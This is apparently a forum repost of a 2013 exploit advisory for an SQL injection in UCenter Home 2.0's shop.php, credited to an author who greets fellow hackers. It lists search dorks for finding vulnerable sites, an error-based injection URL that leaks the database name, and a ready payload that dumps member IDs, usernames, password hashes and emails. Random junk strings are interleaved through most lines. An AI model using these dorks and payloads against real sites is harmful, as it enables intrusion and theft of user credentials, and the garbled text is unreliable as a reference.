' }0 a. m4 l0 |1 k7 @__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ - h' g: I$ |+ R, p
: f0 e% o: O* x
3 A2 k) s$ j* G' V$ j# H4 q! |# r6 d$ Z. I, S5 M% Z& w6 y) L
*/ Author : KnocKout & ]1 i6 n5 b- z9 {! T! b
$ }$ g5 c! W: }1 }% a6 r*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers " U7 j; t9 n8 B4 N1 }" M: b
) }; @( U& N4 a*/ Contact: knockoutr@msn.com : |" K8 ]* ]9 Y% V3 j
1 @7 D. Y) y7 H& E3 x3 O4 |6 o*/ Cyber-Warrior.org/CWKnocKout - h, q' O$ P4 c, I
; Q/ V b8 m4 n4 M7 [__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== * Y% Y2 A% |6 O6 L; i/ Z
$ ^% d& [" Q8 Q: Q, M, QScript : UCenter Home $ q. x. |7 n+ J5 ]6 ?- O6 l( k
" B# n- g& d) [9 z0 B
Version : 2.0 0 j8 q. f! [8 q0 ~ ?' r0 H
& `. x% i+ I: s- P1 iScript HomePage : http://u.discuz.net/ 6 R/ j1 p# c* N" I! Y
- z1 s0 |% ?; ] ~9 c" \* m, P
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
" M! q/ E P0 L2 M3 b- M7 A) u3 u; B" w- E- C5 r f# C+ W% W* S
Dork : Powered by UCenter inurl:shop.php?ac=view " v: O* E% H% A3 B4 T
1 f5 m, b2 _ P# [" G
Dork 2 : inurl:shop.php?ac=view&shopid= ) P5 w3 L' W) i+ l4 c
& L2 Z6 ?( B# d) E; H
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== & A- [/ j1 k7 `- e K; W- P, o9 t
5 ]6 k) I _1 ~1 o; k, m0 Y( Y2 }Vuln file : Shop.php
5 H& H3 N/ C3 y, l6 h7 |$ H# }
5 P8 c- t: A# `: o0 e( `( }9 L' Pvalue's : (?)ac=view&shopid=
5 A( O+ W$ q9 u/ K7 r' d3 Y7 i. s& O5 z5 ?/ X
Vulnerable Style : SQL Injection (MySQL Error Based)
( M. D$ G& j5 c7 a( I6 l
; \. O. } W8 XNeed Metarials : Hex Conversion
( D- g8 ?: n0 ~( Y, C1 j# G% \1 H6 J, t; {( Y$ P+ S9 ?2 H
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
l- U( H/ d* B! W6 g" t1 r% N, E) o0 |* x
Your Need victim Database name. # T7 N4 g8 p. N3 m0 i% y/ l
8 K$ F4 b+ `5 ]
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 ) `4 c, k4 a+ c5 [
: q- E/ u5 k& p8 ]+ k$ s
.. . s3 S& d( A. d
& q, c* O) E, ]! mDB : Okey.
/ x4 ~# q& Z [; N# T3 M. B$ H0 T: @5 w( D
your edit DB `[TARGET DB NAME]` ( s7 m9 E7 V }) o4 |8 H s
# m( {/ y+ s3 ?- C: D6 T: a; G+ p
Example : 'hiwir1_ucenter'
" m& k* O6 d; q1 P; m; m" C2 x9 Y/ @( p
Edit : Okey.
/ v0 p2 b) C2 t) C! k
4 m% Y6 p7 ?+ G! u2 N# i0 lYour use Hex conversion. And edit Your SQL Injection Exploit..
" d" ?6 G: v) U' \* t7 b/ w. n
3 r& ` c' Y7 E+ Q( L* K # }+ ~6 ?( X' L7 F
1 j$ U/ g! f7 O6 U& q8 Q2 d: D qExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
- d6 M1 F$ W5 W! N( p% V |
发表于 2013-2-27 21:31:31
收藏
支持
反对